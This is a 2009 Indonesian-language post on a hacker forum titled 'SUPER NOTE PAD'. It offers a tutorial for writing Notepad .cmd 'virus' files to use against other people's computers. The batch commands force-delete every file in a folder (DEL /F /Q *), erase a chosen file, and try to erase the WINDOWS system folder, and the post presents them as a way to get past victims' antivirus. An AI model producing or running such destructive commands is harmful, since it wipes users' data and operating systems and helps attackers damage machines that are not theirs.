Wednesday, 2018-11-21, 4:00 PM
Welcome Guest | RSS
CHR†SER TH4 C0D3 BR34K3R
Main
Registration
Login
[ New messages · Members · Forum rules · Search · RSS ]
  • Page 1 of 1
  • 1
Forum » Test category » Test forum » SUPER NOTE PAD
SUPER NOTE PAD
erickDate: Thursday, 2009-09-10, 12:28 PM | Message # 1
darkangelo
Group: Administrators
Messages: 1
Reputation: 0
Status: Offline
cuman pengen share dikit yank gw tau....

kalo udah pada bikin virus ampuh yank siap di terbangkan ke komp orang jahil.. eh... tapi ternyata tuh orank makenya 10 antivirus...

susah?? ... gak juga..
ayo kita manggil abang notepad...

abang notepadnya dateng... dengan gaya super notepad...

ini tutornya :

untuk menghapus Files dan Folder

1. buka notepad trus ketik DEL /F /Q *
2. save as dan simpan dengan nama test.cmd
3. kalau elo dobel klik file test.cmd maka semua files dan folder akan terhapus.

untuk menghapus Files Tertentu

1. buka notepad trus ketik erase C:TEST.txt
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka files TEST.txt di drive c:\ akan terhapus

untuk menghapus Folder Tertentu

1. buka notepad trus ketik erase C:WINDOWS
2. save as dan simpan dengan nama test.cmd
3. kalo elo dobel klik file test.cmd maka folder WINDOWS di drive c:\ akan terhapus

sip... ati ati ya..

 
Forum » Test category » Test forum » SUPER NOTE PAD
  • Page 1 of 1
  • 1
Search:


Copyright MyCorp © 2018